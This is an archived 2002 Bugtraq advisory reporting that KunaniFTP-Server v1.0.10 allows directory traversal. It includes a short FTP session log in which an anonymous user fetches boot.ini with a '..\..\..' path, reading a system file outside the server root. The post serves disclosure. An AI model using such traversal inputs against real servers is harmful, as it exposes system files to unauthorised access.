Date: Wed, 11 Dec 2002 06:23:24 +0800
From: "Zero-X www.lobnan.de Team" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com
Subject: KunaniFTP-Server v.1.0.10 allows dictionary traversal
KunaniFTP-Server v.1.0.10 allows dictionary traversal:
Some ftp-commands in KunaniFTP-Server allows dictionary traversal.
Example:
######################################################
Verbindung mit server.
220 Kunani FTP Server Ready ( www.kunani.com )
Benutzer (server:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> get ..\..\..\..\..\boot.ini
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
#####################################################
Sorry for my very bad english. *g*
~~ Zero X, member of www.lobnan.de ~~
--
______________________________________________
http://www.linuxmail.org/
Now with POP3/IMAP access for only US$19.95/yr
Powered by Outblaze
